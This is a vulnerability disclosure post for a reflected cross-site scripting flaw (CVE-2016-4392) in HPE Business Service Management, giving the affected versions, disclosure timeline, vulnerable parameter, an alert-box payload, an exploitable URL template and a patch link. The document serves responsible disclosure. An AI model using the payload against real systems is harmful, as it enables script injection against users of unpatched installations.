HPE Business Service Management (BSM) – Reflected XSS (CVE-2016-4392)

Posted on Updated on

Product & Service Introduction;

HP Business Service Management (BSM) is an end-to-end management solution that integrates network, server, application and business transaction monitoring. HP Business Service Management is developed and marketed by the HP Software Division.

Release Date;

21 Oct 2016

Affected Product;

HP Business Service Management Software 9.1x, 9.20 - 9.25IP1


Abstract Advisory Information;

Ugur Cihan Koc discovered a Reflected XSS vulnerability in HPE BSM

Vulnerability Disclosure Timeline;

27 Nov 2015     Bug reported to the vendor.
03 Dec 2015     Asked about the case.
21 Oct 2016     Fixed
25 Oct 2016     Discloused

Exploitation Technique;

Remote, Authenticated

TECHNICAL DETAILS Payloads;

"onload="alert(1) 


Affected Parameter;

filePath


Exploitable URL;

http://[IP]/jsps/cheatsheets/openVideo.jsp?filePath=/%22onload=%22alert%281%29 


Solution Fix & Patch;

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05316329


POC Video;

https://drive.google.com/open?id=0B-LWHbwdK3P9enAzbGVHUlFCa3c


Credits & Authors;

Ugur Cihan Koc
@_uceka_
http://www.uceka.com

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s